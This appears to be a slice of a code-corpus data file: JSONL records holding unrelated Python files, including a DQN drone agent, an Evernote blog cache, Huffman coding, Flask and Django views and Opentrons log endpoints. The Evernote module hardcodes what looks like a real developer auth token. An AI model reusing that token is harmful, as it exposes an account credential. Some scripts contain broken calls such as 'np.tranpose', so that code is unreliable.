alias(self, name):\n if name == None:\n return Null\n else:\n return nvl(self.aliases.get(name, Null).canonical, name)\n\n def initializeAliases(self):\n try:\n try:\n alias_json = File(self.settings.alias_file).read()\n except Exception as e:\n alias_json = '{}'\n\n self.aliases = {k:struct.wrap(v) for k, v in CNV.JSON2object(alias_json).items()}\n Log.note('{{num}} aliases loaded', {'num': len(self.aliases.keys())})\n except Exception as e:\n Log.error('Can not init aliases', e)","sub_path":"pycfiles/Bugzilla_ETL-0.3.13353-py2.7/parse_bug_history.py","file_name":"parse_bug_history.py","file_ext":"py","file_size_in_byte":32925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"374029412","text":"from django.shortcuts import get_object_or_404, render_to_response\r\nfrom django.http import HttpResponseRedirect\r\nfrom django.template import RequestContext\r\nfrom django.db.models import get_model\r\nfrom models import Resume, Skill\r\n\r\ndef home(request):\r\n '''\r\n Home page redirects to default resume\r\n '''\r\n \r\n resume = get_object_or_404(Resume, is_default=True)\r\n section = get_object_or_404(resume.sections.all(), is_default=True)\r\n return HttpResponseRedirect(section.get_absolute_url())\r\n\r\n\r\ndef resume(request, resume_slug):\r\n '''\r\n Resume page redirects to default section\r\n '''\r\n \r\n resume = get_object_or_404(Resume, slug=resume_slug)\r\n section = get_object_or_404(resume.sections.all(), is_default=True)\r\n return HttpResponseRedirect(section.get_absolute_url())\r\n\r\n\r\ndef section(request, resume_slug, section_slug):\r\n '''\r\n Section page renders the template with the same name as the section slug\r\n '''\r\n \r\n resume = get_object_or_404(Resume, slug=resume_slug)\r\n section = get_object_or_404(resume.sections.all(), slug=section_slug)\r\n \r\n context = {\r\n 'resume': resume,\r\n 'section': section\r\n }\r\n \r\n return render_to_response([\r\n \"resume/%s/%s.html\" 
% (resume.slug, section.slug),\r\n \"resume/default/%s.html\" % section.slug\r\n ], {}, context_instance=RequestContext(request, context))\r\n\r\n\r\ndef object(request, resume_slug, section_slug, object_slug):\r\n '''\r\n Object page uses section.model_class to render an object. For example,\r\n if section.model_class is 'resume.Job', a Job with object_slug is found\r\n and put in the 'job' context variable, and the 'job_detail.html'\r\n template is rendered\r\n '''\r\n \r\n resume = get_object_or_404(Resume, slug=resume_slug)\r\n section = get_object_or_404(resume.sections.all(), slug=section_slug)\r\n\r\n if section.model_class == '':\r\n # no specified object class for this section, so throw a 404\r\n raise Http404\r\n\r\n bits = section.model_class.split('.')\r\n model_name, app = bits[-1], '.'.join(bits[:-1])\r\n model = get_model(app, model_name)\r\n\r\n obj = get_object_or_404(model.objects.filter(resume=resume),\r\n slug=object_slug)\r\n object_name = obj.__class__.__name__.lower()\r\n\r\n context = {\r\n 'resume': resume,\r\n 'section': section,\r\n 'object_detail': True\r\n }\r\n context[object_name] = obj\r\n\r\n return render_to_response([\r\n \"resume/%s/%s_detail.html\" % (resume.slug, object_name),\r\n \"resume/default/%s_detail.html\" % object_name,\r\n ], {}, context_instance=RequestContext(request, context))\r\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"109263572","text":"\n# test the server send and recv\nimport socket\nimport logging;\nimport time;\nlogging.getLogger().setLevel(logging.INFO)\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM);\nip_addr = '127.0.0.1';\nip_port = 6689\nserver.bind((ip_addr, ip_port));\nserver.listen();\nlogging.info(\"waiting for connectiong...\");\nconnect, (host, port) = server.accept();\n\nwhile True:\n time.sleep(1)\n\n connect.sendall(b'test')\n 
logging.info(\"has sent\")\n\n# problem summary,\n# 1. if the client exit, the server sendall will raise error ConnectionResetError: [WinError 10054] An existing connection was forcibly closed by the remote host","sub_path":"Socket-Sever-Client/Test/Test_Sendall/server_test_sendall.py","file_name":"server_test_sendall.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"150569513","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\n#Reinforcement Learning related imports\nimport sys\nimport pylab\nimport random\nimport numpy as np\nfrom collections import deque\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.models import Sequential\ntry:\n from env import Environment \nexcept ImportError:\n print(\"import Environment one more check\")\n sys.exit(1)\n\n#ROS related imports\ntry:\n import rospy\nexcept ImportError:\n print(\"Unable to import rospy!\")\n print(\"Please to check it.\")\n sys.exit(1)\n\n# Object detection module imports\nimport std_msgs.msg\nfrom tensorflow_object_detector.msg import MsgState\n\n#Drone Control module imports\nfrom geometry_msgs.msg import PoseStamped \nfrom geometry_msgs.msg import Quaternion\nfrom swarm_ctrl_pkg.srv import srvMultiSetpointLocal, srvMultiSetpointLocalRequest\nfrom sensor_msgs.msg import Image #이미지 캡쳐\n#Max Episode 300\nEPISODES = 20000\n\n#드론의 현재위치를 받아서 저장하는 object \n#gazebo에서 위치를 publishing 때마다 계속 업데이트\nquad_pose=PoseStamped()\n#image_capture\nset_image=Image()\n\ndef poseagentCB(posedata):\n \"\"\"To updateDrone's local position \n \"\"\"\n global quad_pose\n quad_pose=posedata\n\ndef ImageCB(Imagedata):\n \n #rospy.loginfo('I got Image')\n set_image.data =Imagedata.data\n set_image.encoding =Imagedata.encoding\n set_image.header.frame_id =Imagedata.header.frame_id \n set_image.header.seq =Imagedata.header.seq \n set_image.header.stamp.nsecs=Imagedata.header.stamp.nsecs\n 
set_image.header.stamp.secs =Imagedata.header.stamp.secs \n set_image.height =Imagedata.height \n set_image.is_bigendian =Imagedata.is_bigendian \n set_image.step =Imagedata.step \n set_image.width =Imagedata.width \n\ndef image_capture():\n \n rate = rospy.Rate(10) \n \n \n pub.publish(set_image)\n \n rate.sleep()\nclass DQNAgent:\n \"\"\"Learning Agent\n \"\"\"\n def __init__(self, state_size, action_size):\n \n self.load_model = False\n \n # Define state size and action size(상태와 행동의 크기 정의)\n self.state_size = state_size\n self.action_size = action_size\n\n # DQN Hyperparameter(하이퍼파라미터)\n self.discount_factor = 0.99\n self.learning_rate = 0.001\n self.epsilon = 1.0\n self.epsilon_decay = 0.999\n self.epsilon_min = 0.0001 # q-value 적용 시기\n self.batch_size = 64\n #Minimum learning period(최소 학습 주기)\n self.train_start = 1000 \n #Replay Memory maxlen=2000(리플레이 메모리 최대 2000)\n self.memory = deque(maxlen=2000)\n\n # model:Saving temp weight, target_model=Updating model's weight \n self.model = self.build_model()\n self.target_model = self.build_model()\n self.update_target_model()\n\n self.pose_sub=rospy.Subscriber(\"/camila1/mavros/local_position/pose\",PoseStamped,callback=poseagentCB)\n\n # if self.load_model:\n # self.model.load_weights(\"./save_model/cartpole_dqn_trained.h5\")\n\n # 상태가 입력, 큐함수가 ���력인 인공신경망 생성\n def build_model(self):\n model = Sequential()\n model.add(Dense(24, input_dim=self.state_size, activation='relu',\n kernel_initializer='he_uniform'))\n model.add(Dense(24, activation='relu',\n kernel_initializer='he_uniform'))\n model.add(Dense(self.action_size, activation='linear',\n kernel_initializer='he_uniform'))\n model.summary()\n model.compile(loss='mse', optimizer=Adam(lr=self.learning_rate)) #loss 는 mean square equation optimizer는 gradient decent의 방식\n return model\n #수정 필요 아웃풋이 7개일 필요는 없는가?\n\n # 타깃 모델을 모델의 가중치로 업데이트\n def update_target_model(self):\n self.target_model.set_weights(self.model.get_weights())\n\n # 입실론 탐욕 정책으로 행동 선택\n def 
get_action(self, state):\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.action_size)#해당 범위 내의 인덱스를 랜덤하게 1개 반환한다.\n else:\n q_value = self.model.predict(state)\n return np.argmax(q_value[0])#결과가 [[1,2,3,4,5,7]]의 형태를 가지기 때문이다.\n\n # 샘플 을 리플레이 메모리에 저장\n def append_sample(self, state, action, reward, next_state, done):\n self.memory.append((state, action, reward, next_state, done))\n\n # 리플레이 메모리에서 무작위로 추출한 배치로 모델 학습\n def train_model(self):\n if self.epsilon > self.epsilon_min:\n self.epsilon *= self.epsilon_decay\n\n # 메모리에서 배치 크기만큼 무작위로 샘플 추출\n mini_batch = random.sample(self.memory, self.batch_size)\n\n states = np.zeros((self.batch_size, self.state_size))\n next_states = np.zeros((self.batch_size, self.state_size))\n actions, rewards, dones = [], [], []\n\n for i in range(self.batch_size):\n states[i] = mini_batch[i][0]\n actions.append(mini_batch[i][1])\n rewards.append(mini_batch[i][2])\n next_states[i] = mini_batch[i][3]\n dones.append(mini_batch[i][4])\n\n # 현재 상태에 대한 모델의 큐함수\n # 다음 상태에 대한 타깃 모델의 큐함수\n target = self.model.predict(states)\n target_val = self.target_model.predict(next_states)\n\n # 벨만 최적 방정식을 이용한 업데이트 타깃 (배치 모델 업데이트)\n for i in range(self.batch_size):\n if dones[i]:\n target[i][actions[i]] = rewards[i]\n else:\n target[i][actions[i]] = rewards[i] + self.discount_factor * (\n np.amax(target_val[i]))\n\n self.model.fit(states, target, batch_size=self.batch_size,\n epochs=1, verbose=0)\n\n\ndef interpret_action(action):\n scaling_factor = 0.5 #위치 이동값\n if action == 0:\n quad_action = (0, 0, 0)\n elif action == 1:\n quad_action = (scaling_factor, 0, 0)\n elif action == 2:\n quad_action = (0, scaling_factor, 0)\n elif action == 3:\n quad_action = (0, 0 , 0.2)# z값 고정 0.2\n elif action == 4:\n quad_action = (-scaling_factor, 0, 0)\n elif action == 5:\n quad_action = (0, -scaling_factor, 0)\n elif action == 6:\n quad_action = (0, 0, -0.2)\n\n return quad_action\n\n\nif __name__ == \"__main__\":\n \n env = 
Environment(image_shape=(1280, 720))\n state_size = 3\n action_size = 7\n threshehold_pose = 0.1\n \n\n # DQN 에이전트 생성\n rospy.init_node('DQNAgent', anonymous=False)\n \n \n pub = rospy.Publisher('image_capture',Image,queue_size=10)\n sub = rospy.Subscriber('/iitp_drone/camera_1/image_raw',Image, ImageCB)\n \n agent = DQNAgent(state_size, action_size)\n rospy.wait_for_service('/multi_setpoint_local')\n goto_agent_client = rospy.ServiceProxy('/multi_setpoint_local', srvMultiSetpointLocal)\n scores, episodes = [], []\n\n for e in range(EPISODES):\n done = False\n score = 0\n print(\"now_reset\")##필요없음\n state = env.reset()\n state = np.reshape(state, [1, state_size])#배열 reshape하는 코드 이후 맞는지 check 수정\n \n while not done:\n action = agent.get_action(state)#현재 state에 대한 action결과를 quad_action에 저장하고\n quad_action=interpret_action(action)\n \n #드론이 실제로 움직일 좌표\n quad_action_offset_x=quad_pose.pose.position.x+quad_action[0]\n quad_action_offset_y=quad_pose.pose.position.y+quad_action[1] \n quad_action_offset_z=quad_pose.pose.position.z+quad_action[2]\n \n goto_agent_client(\"POINT\",quad_action_offset_x,quad_action_offset_y,quad_action_offset_z)\n\n #드론 위치 이동시 실제 드론의 위치와 서비스 요청한 액션과의 비교 후 다음상태 받기\n #quad_pose다시 서브스크라이브후 quad_action_offset와 비교 \n while True:\n if ((abs(quad_pose.pose.position.x-quad_action_offset_x) 저장\n agent.append_sample(state, action, reward, next_state, done)\n # 매 타임스텝마다 학습\n if len(agent.memory) >= agent.train_start:\n agent.train_model()\n\n score += reward #score는 int scores는 리스트 형태\n state = next_state\n\n if done:\n #각 에피소드마다 타깃 모델을 모델의 가중치로 업데이트\n agent.update_target_model()\n\n # 에피소드마다 학습 결과 출력\n scores.append(score)\n episodes.append(e)\n pylab.plot(episodes, scores, 'b')\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn.png\")\n print(\"episode:\", e, \" score:\", score, \" memory length:\",\n len(agent.memory), \" epsilon:\", agent.epsilon)\n\n #수정필요# 이전 10개 에피소드의 점수 평균이 490보다 크면 학습 중단 \n \n # if 
(np.mean(scores[-min(10, len(scores)):]) >1000 and (e>500)) :\n # agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn.h5\")\n # sys.exit()\n if (e==1000) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep1000.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep1000.png\")\n print('ep1000 saved')\n \n if (e==5000) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep5000.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep5000.png\")\n print('ep5000 saved')\n \n if (e==10000) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep10000.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep10000.png\")\n print('ep10000 saved')\n if (e==15000) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep15000.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep15000.png\")\n print('ep15000 saved')\n if (e==19999) :\n agent.model.save_weights(\"/home/injae/catkin_ws/src/RSD/src/save_model/selfie_drone_dqn_ep19999.h5\")\n pylab.savefig(\"/home/injae/catkin_ws/src/RSD/src/save_graph/selfie_drone_dqn_ep19999.png\")\n print('ep19999 saved,exit')\n sys.exit()\n\n \n \n # if np.mean(scores[-min(10, len(scores)):]) > 490:#+점수가 10점 한번이니까 리워드를 더주고 스코어로는 부족 그냥 리워드가 30 이상일떄 학습을 종료하는 건 어떰? \n # agent.model.save_weights(\"/home/injae/catkin_ws/src/people_detection/src/save_model/selfie_drone_dqn.h5\")\n # sys.exit()\n \n\n\n\n# 수정필요!! 
지금 문제점 물체가 안잡혀서 리셋이 될때 사람이 디텍션 되면 리셋 위치가 아닌데도 디텍션을 해서 스텝을 진행\n","sub_path":"src/DQNAgent.py","file_name":"DQNAgent.py","file_ext":"py","file_size_in_byte":12795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"291076876","text":"\nimport torch\nimport numpy as np\n\ndata_file = '../data/demo_ts_spoon_sprial_setion.csv'\n\ndef load_demo():\n \n data = []\n\n ee_pos_data = np.loadtxt(open(data_file, \"rb\"), delimiter=\",\", skiprows=0)\n\n bias = np.mean(ee_pos_data, 0)\n std = np.std(ee_pos_data, 0)\n\n for k in range(ee_pos_data.shape[0]):\n datum = ee_pos_data[k,:]\n data.append(torch.tensor([ [ (datum[0]-bias[0])/std[0], (datum[1]-bias[1])/std[1] ] ]))\n\n return torch.stack(data)","sub_path":"examples/get_demo.py","file_name":"get_demo.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"241974371","text":"from gtnlplib.constants import OFFSET\nimport numpy as np\nimport torch\nimport operator\n# deliverable 6.1\ndef get_top_features_for_label_numpy(weights,label,k=5):\n '''\n Return the five features with the highest weight for a given label.\n\n :param weights: the weight dictionary\n :param label: the label you are interested in\n :returns: list of tuples of features and weights\n :rtype: list\n '''\n\n top_features = []\n\n filtered_weights = {pair : weight for pair, weight in weights.items() if pair[0] == label}\n\n for pair, weight in weights.items():\n if pair[0] == label:\n if len(top_features) < k:\n top_features.append((pair, weight))\n else:\n min_feature = min(top_features, key=lambda x:x[1])\n if weight > min_feature[1]:\n top_features = [(pair, weight) if x == min_feature else x for x in top_features]\n\n top_features.sort(key=operator.itemgetter(1), reverse=True)\n return top_features\n\n\n# deliverable 6.2\ndef get_top_features_for_label_torch(model,vocab,label_set,label,k=5):\n '''\n Return the 
five words with the highest weight for a given label.\n\n :param model: PyTorch model\n :param vocab: vocabulary used when features were converted\n :param label_set: set of ordered labels\n :param label: the label you are interested in \n :returns: list of words\n :rtype: list\n '''\n\n vocab = sorted(vocab)\n features = list(model.parameters())[0]\n\n label_dict = {}\n i = 0\n for l in label_set:\n label_dict[l] = i\n i = i + 1\n\n features = (list(model.parameters())[0][label_dict[label]].data.numpy())\n features = features.argsort()[-k:][::-1]\n ret = []\n for feat_i in features:\n ret.append(vocab[feat_i])\n\n return ret\n\n# deliverable 7.1\ndef get_token_type_ratio(counts):\n '''\n compute the ratio of tokens to types\n\n :param counts: bag of words feature for a song, as a numpy array\n :returns: ratio of tokens to types\n :rtype: float\n\n '''\n # print(counts)\n distinct = 0\n sum = 0\n for count in counts:\n if count != 0:\n distinct += 1\n sum += count\n if distinct != 0:\n return sum / distinct\n return 0\n\n# deliverable 7.2\ndef concat_ttr_binned_features(data):\n '''\n Discretize your token-type ratio feature into bins.\n Then concatenate your result to the variable data\n\n :param data: Bag of words features (e.g. 
X_tr)\n :returns: Concatenated feature array [Nx(V+7)]\n :rtype: numpy array\n\n '''\n num_bins = 7\n include_bins = []\n for row in data:\n # print(str(row.shape) + str(r))\n ratio = int(get_token_type_ratio(row))\n bins = np.asarray([1 if i == ratio else 0 for i in range(num_bins)])\n np.concatenate((row, bins), axis=0)\n new_row = np.append(row, bins)\n include_bins.append(new_row)\n return np.asarray(include_bins)\n\n\n","sub_path":"psets/ps1/gtnlplib/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"228822792","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QLabel, QMainWindow, QLineEdit, QAction, QHBoxLayout, QWidget, QPushButton, \\\n QVBoxLayout\nfrom PyQt5.QtCore import Qt\n\n\n# Subclass QMainWindow to customise your application's main window\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.setWindowTitle(\"Conversion Tool.\")\n layouts = [QHBoxLayout() for x in range(3)]\n\n lbl_feet = QLabel(\"Feet\")\n self.edit_box = QLineEdit(\"Type a number here\")\n layouts[0].addWidget(lbl_feet)\n layouts[0].addWidget(self.edit_box)\n\n lbl_metres = QLabel(\"Metres\")\n self.lbl_answer = QLabel(\"...\")\n layouts[1].addWidget(lbl_metres)\n layouts[1].addWidget(self.lbl_answer)\n\n btn_go = QPushButton(\"Go\")\n btn_go.pressed.connect(lambda: self.do_convert(12))\n layouts[2].addWidget(btn_go, Qt.AlignRight)\n\n main_layout = QVBoxLayout()\n\n for layout in layouts:\n main_layout.addLayout(layout)\n\n\n # The `Qt` namespace has a lot of attributes to customise\n # widgets. See: http://doc.qt.io/qt-5/qt.html\n widget = QWidget()\n widget.setLayout(main_layout)\n\n # Set the central widget of the Window. 
class Post(object):
    """Metadata and content for a single blog post.

    Attributes:
        title: post title string
        guid: Evernote note guid
        tags: list of tag-name strings
        created: creation time, epoch milliseconds
        updated: last-update time, epoch milliseconds
        content: raw note body (ENML)
    """
    # Class-level defaults kept from the original; every instance
    # re-assigns them in __init__, so they only matter for class access.
    title = None
    guid = None
    tags = []
    created = None
    updated = None
    content = None

    def __init__(self, title=None, guid=None, tags=None,
                 created=None, updated=None, content=None):
        self.title = title
        self.guid = guid
        # Bug fix: the original used a mutable default (tags=[]), so every
        # Post created without tags shared — and mutated — one list.
        self.tags = [] if tags is None else tags
        self.created = created
        self.updated = updated
        self.content = content

    def to_dic(self):
        """Render the post as a template-friendly dict.

        `created` is epoch milliseconds, formatted like "January 01, 1970".
        """
        time_fmt = "%B %d, %Y"
        return dict(
            title=self.title,
            tags=self.tags,
            created=datetime.utcfromtimestamp(self.created/1000).strftime(time_fmt),
            # `updated` intentionally omitted, as in the original.
            content=self.content
        )
self.spec = NoteStore.NotesMetadataResultSpec()\n self.spec.includeTitle = True\n self.spec.includeTagGuids = True\n self.spec.includeUpdated = True\n self.spec.includeCreated = True\n self.spec.includeDeleted = True\n self.spec.includeUpdateSequenceNum = True\n\n # Init last update time\n self.last_update = 0\n # Init notebook's update sequence num\n self.usn = 0\n self.sync()\n\n def update_time(self):\n self.last_update = int(time.time())\n\n def parse_enml(self, enml):\n \"\"\"Convert ENML to HTML\"\"\"\n # First delete xml declaration\n # TODO: Finish it, no idea\n pass\n\n def prepare_store(self):\n # Update tags\n tags = self.note_store.listTagsByNotebook(self.auth_token, self.blog_notebook_guid)\n self.tags = [{\"guid\": tag.guid, \"name\": tag.name} for tag in tags]\n\n notes = self.note_store.findNotesMetadata(self.auth_token, self.filter,\n 0, constants.EDAM_USER_NOTES_MAX, self.spec)\n self.posts = []\n for note in notes.notes:\n tag_names = self.note_store.getNoteTagNames(self.auth_token, note.guid)\n # TODO: Compile ENML\n note_content = self.note_store.getNoteContent(self.auth_token, note.guid)\n post = Post(note.title, note.guid, tag_names, note.created,\n note.updated, note_content)\n self.posts.append(post)\n # Sort by created time\n self.posts.sort(key=lambda curr_post: curr_post.created, reverse=True)\n\n def sync(self):\n \"\"\"Sync between server cache and evernote\n\n Cache consists of notes, tags.\n \"\"\"\n time_now = int(time.time())\n # Check sync one time per 15min\n if time_now - self.last_update < 10:\n return\n # Check if there are new content\n sync_state = self.note_store.getSyncState(self.auth_token)\n curr_usn = sync_state.updateCount\n if curr_usn <= self.usn:\n return\n self.usn = curr_usn\n\n self.prepare_store()\n self.update_time()\n\n def get_posts(self):\n return [post.to_dic() for post in self.posts]\n\n def get_tags(self):\n return [tag[\"name\"] for tag in self.tags]\n\n def get_last_update(self):\n return 
datetime.fromtimestamp(self.last_update).strftime(\"%Y-%m-%d %H:%M:%S\")\n\n\ndef test():\n cache = EvernoteCache()\n\n\nif __name__ == \"__main__\":\n test()\n","sub_path":"backup-to-evernote/blog/memcache.py","file_name":"memcache.py","file_ext":"py","file_size_in_byte":5258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"397341144","text":"# exercise 3\r\n\r\nimport sys\r\nfrom pymongo import MongoClient\r\nfrom pprint import pprint\r\n\r\nif __name__ == \"__main__\":\r\n client = MongoClient()\r\n db = client.lab5\r\n pokedex = db.pokedex\r\n\r\n wind_pokemon = []\r\n wind_weak = []\r\n\r\n # get Baram's pokemons\r\n for i in range(1,len(sys.argv)):\r\n wind_pokemon.append(sys.argv[i])\r\n\r\n # weaknesses of Baram's pokemons\r\n for w in wind_pokemon:\r\n wind_weak.append(pokedex.find_one({'name':w})['weaknesses'])\r\n\r\n # intersection of weaknesses\r\n weak_type = set(wind_weak[0])\r\n for w in wind_weak[1:]:\r\n weak_type = weak_type & set(w)\r\n\r\n weak_type = list(weak_type)\r\n\r\n for candidate in pokedex.find(\r\n {'type' : {'$in' : weak_type}},\r\n {'_id':0, 'id':1, 'name':1, 'type':1}).sort('name'):\r\n\r\n pprint(candidate)\r\n","sub_path":"BDE4/lab/lab05/advice/exercise5-3.py","file_name":"exercise5-3.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"468493107","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport heapq\n\nclass HeapNode():\n def __init__(self, char, freq):\n self.char = char\n self.freq = freq\n self.left = None\n self.right = None\n \n \n def __cmp__(self, other):\n if(other == None):\n return -1\n if(isinstance(other, HeapNode)):\n return -1\n return self.freq > other.freq\n \n \n def __lt__(self, other):\n return self.freq < other.freq\n\n def __eq__(self, other):\n if(other == None):\n return False\n if(not 
def heapCoding(root, currentCode, codes, reverse):
    """Walk the Huffman tree, filling the two code tables in place.

    `codes` maps char -> bit string; `reverse` maps bit string -> char.
    Left edges append "0" and right edges append "1"; leaves are the
    nodes whose `char` is not None.

    :param root: current HeapNode (or None)
    :param currentCode: bit-string prefix accumulated so far
    :param codes: dict mutated with char -> code entries
    :param reverse: dict mutated with code -> char entries
    """
    if root is None:
        return
    # Idiom fix: identity comparison with None instead of ``!= None``.
    if root.char is not None:
        codes[root.char] = currentCode
        reverse[currentCode] = root.char
    heapCoding(root.left, currentCode + "0", codes, reverse)
    heapCoding(root.right, currentCode + "1", codes, reverse)
def dropEndWhile(pred, s):
    """Return `s` with its trailing run of pred-satisfying chars removed.

    Bug fix: the original scanned with ``range(len(s)-1, 0, -1)``, which
    never examines index 0, so a string made entirely of matching
    characters incorrectly kept its first character.

    :param pred: predicate on a single character
    :param s: input string
    :returns: `s` minus the matching suffix
    """
    k = 0
    for i in range(len(s) - 1, -1, -1):
        if pred(s[i]):
            k += 1
        else:
            break
    return s[0:len(s) - k]
def detectFreq(bits):
    """Return the length of the shortest run of identical chars in `bits`.

    Returns 65535 (the original's sentinel) for an empty string, and
    clamps the result at 65535 as the original recursion effectively did.
    The iterative groupby replaces a recursion that could blow the
    interpreter's recursion limit on long bit strings.

    :param bits: string of '0'/'1' characters
    :returns: shortest run length, or 65535 when `bits` is empty
    """
    if bits == '':
        return 65535
    shortest = min(len(list(run)) for _, run in itertools.groupby(bits))
    return min(shortest, 65535)
eta = np.array(eta_2D)

# --- SVD decomposition of the space-time field eta (space x time) ---
U, S, V = np.linalg.svd(eta)
Vt = np.transpose(V)
# Bug fix: the original `sv = np.matmul(S, Vt)` raised a shape error
# (1-D S against the full right-singular matrix).
# NOTE(review): diag(S) times the leading rows of V is the most plausible
# intent ("singular values applied to the temporal modes") — confirm.
sv = np.matmul(np.diag(S), V[:S.size, :])
# Bug fix: the original called np.tranpose / np.matmup (typos that raise
# AttributeError before anything is printed).
Ut = np.transpose(U)
# NOTE(review): `A = np.matmup(U)` was broken (typo AND wrong arity for a
# matrix product); projecting the data onto the left singular vectors is
# the most plausible intent — confirm.
A = np.matmul(Ut, eta)

# --- PCA via the eigen-decomposition of the spatial covariance ---
eta_t = np.transpose(eta)
covar = np.matmul(eta, eta_t)
# Renamed from `eval` to avoid shadowing the builtin.
eigvals, evec = np.linalg.eigh(covar)
evec_t = np.transpose(evec)
pc = np.matmul(evec_t, eta)

print(pc)

print ("+" * 20 + " U: Spatial Singular Vectors " + "+"*20)
print (U)

# NOTE(review): numpy's svd returns Vh (right singular vectors), not a
# "singular value matrix" — the label below is kept verbatim but looks
# misleading.
print ("+" * 20 + " V: Singular Value Matrix " + "+"*20)
def smallest_multiple(start, end):
    """Smallest positive integer divisible by every integer in [start, end].

    This is lcm(start, ..., end). The original brute-forced successive
    multiples of `end`, which is astronomically slow for ranges like
    1..20; the running-LCM via gcd is O(end - start) multiplications.

    :param start: lower bound (inclusive), assumed >= 1
    :param end: upper bound (inclusive)
    :returns: the least common multiple of the range (1 for an empty range)
    """
    result = 1
    for i in range(start, end + 1):
        result = result * i // math.gcd(result, i)
    return result
# Read an integer and report whether its decimal digits form a palindrome.
n = int(input("enter the integer:"))
original = n
# Bug fix: the original digit loop never terminated for negative input
# (floor division drives n to -1, not 0). Reverse the absolute value;
# a negative number is never a palindrome (the sign has no mirror).
n = abs(n)
rev = 0
while n != 0:
    rem = n % 10          # least-significant digit
    rev = rev * 10 + rem  # shift previous digits left, append
    n //= 10
if original == rev:
    print(rev, "is palindrome")
else:
    print(rev, "is not palindrome")
@api.route('/fibo/api/v1.0/<steps>', methods=['POST', 'GET'])
def do_fibo(steps):
    """Return the first `steps` Fibonacci numbers as JSON.

    `steps` arrives as a URL path segment (string); non-integer input
    yields an error payload instead of an unhandled exception.
    """
    # NOTE(review): the original registered this view on the bare
    # '/fibo/api/v1.0/' rule (same as do_return, and with no placeholder
    # for `steps`), so Flask could never supply the argument — the
    # '<steps>' converter was almost certainly stripped from the source.
    try:
        steps = int(steps)
    except ValueError:
        return jsonify(
            {"result": {"Error01": "You must submit a whole number!"}})

    obj = restfib()
    result = obj.san_number(steps)
    if result is True:
        result = obj.make_list(steps)
    return jsonify({'result': result})
def _get_options(params: Mapping[str, str],
                 default_length: int) -> Dict[str, Any]:
    """ Parse log-dump options from request query parameters.

    Malformed values fall back to the defaults rather than failing:

    - ``format``: 'text' or 'json' (default: 'text')
    - ``records``: positive int, at most ``log_control.MAX_RECORDS``
      (default: ``default_length``)

    Only reads ``params``, so the request body stays readable.
    """
    response: Dict[str, Any] = {
        'format': 'text',
        'records': default_length
    }

    # Removed a leftover debug print() of the full params mapping that
    # ran on every request.

    if 'format' in params:
        if params['format'] not in ('text', 'json'):
            LOG.error(f"Bad log format requested: {params['format']}")
        else:
            response['format'] = params['format']

    if 'records' in params:
        try:
            records = int(params['records'])
            # Re-raise out-of-range counts so they are handled like
            # unparsable ones.
            if records <= 0 or records > log_control.MAX_RECORDS:
                raise ValueError(records)
        except (ValueError, TypeError):
            LOG.exception(f"Bad records count requested: {params['records']}")
        else:
            response['records'] = records
    return response
The\n identifier is sent to systemd and therefore invalid syslog ids will result\n in an empty response body, not a 404.\n\n In addition to actual syslog identifiers, for backwards compatibility the\n path can be ``serial.log``, which corresponds to syslog id\n ``opentrons-api-serial`` or ``api.log``, which corresponds to syslog id\n ``opentrons-api``.\n\n For instance, ``GET /logs/api.log?format=json`` gives the API logs in json\n format.\n \"\"\"\n ident = request.match_info['syslog_identifier']\n if ident == 'api.log':\n ident = 'opentrons-api'\n elif ident == 'serial.log':\n ident = 'opentrons-api-serial'\n opts = _get_options(request.query, 500000)\n return await _get_log_response(\n ident, opts['records'], opts['format'])\n\n\nasync def set_syslog_level(request: web.Request) -> web.Response:\n \"\"\"\n Set the minimum level for which logs will be sent upstream via syslog-ng\n\n POST /settings/log_level/upstream {\"log_level\": str level, null} -> 200 OK\n\n \"\"\"\n try:\n body = await request.json()\n except json.JSONDecodeError:\n return web.json_response(status=400,\n data={\"message\": \"request must be json\"})\n if 'log_level' not in body:\n return web.json_response(\n status=400,\n data={\"message\": \"body must have log_level key\"})\n log_level = body['log_level']\n ok_syslogs = {\n 'error': 'err',\n 'warning': 'warning',\n 'info': 'info',\n 'debug': 'debug'\n }\n if log_level is None:\n syslog_level = 'emerg'\n 